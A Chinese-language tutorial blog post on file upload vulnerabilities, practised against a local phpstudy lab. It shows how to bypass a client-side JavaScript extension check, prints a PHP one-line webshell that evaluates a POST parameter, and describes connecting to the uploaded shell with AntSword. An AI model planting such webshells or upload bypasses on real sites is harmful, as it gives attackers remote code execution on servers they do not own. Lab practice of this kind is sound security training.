文件上传的小点总结

1.文件上传漏洞

服务器端脚本语言对上传文件没有严格的验证和过滤,就可以给攻击者上传恶意脚本文件的可能。

文件上传检测绕过:

简单思路:(这里以前端上传图片为例)

①开启phpstudy,启动apache即可,将目录设为靶场网站下www的目录。

②获取靶场源码,可以先保存到本地。

③使用notepad++修改文件上传过滤的JS文件,使其条件判断允许非正常文件后缀通过,并且在form表单中加入action属性,处理前端页面。

下面就是一个文件类型判断的代码,将判断条件可以直接改为1==-1就可以让文件允许上传。

复制代码
//判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;alert(errMsg);
        return false;
    }

重新打开本地保存好的靶场首页文件,选择任意php文件上传后,复制图片地址进行访问。(使用了一个info.php文件)

如果要上传一句话木马,那么直接写文件

复制代码
<?php @_eval($_POST['hack']); ?>

将文件名改为111.php,直接上传文件,上传成功后,复制图片地址。使用蚁剑,将刚才的地址和连接密码(也就是POST参数)连接并添加。

上传成功,刚才的两个文件这里都可以看到。

相关推荐
PcVue China6 小时前
法国彩虹重磅发布EmVue:解锁能源监控新方式
安全·自动化·软件工程·能源·数字化
Y_037 小时前
网络安全基础知识【6】
安全·web安全
东风西巷13 小时前
猫眼浏览器:简约安全的 Chrome 内核增强版浏览器
前端·chrome·安全·电脑·软件需求
xyphf_和派孔明15 小时前
关于Web前端安全防御之点击劫持的原理及防御措施
安全·点击劫持
Sandman6z15 小时前
启用“安全登录”组合键(Ctrl+Alt+Delete)解锁
安全
芯盾时代15 小时前
芯盾时代受邀出席安全可信数据要素交易流通利用研讨会
安全·网络安全·数据安全·芯盾时代
网安Ruler17 小时前
Web开发-PHP应用&原生语法&全局变量&数据接受&身份验证&变量覆盖&任意上传(代码审计案例)
网络·安全·网络安全·渗透·红队
xyphf_和派孔明17 小时前
关于Web前端安全防御XSS攻防的几点考虑
安全
亲爱的非洲野猪18 小时前
OAuth 2.0 详解:现代授权的核心协议
安全·认证
bing_15819 小时前
如何保护 Redis 实例的安全?
数据库·redis·安全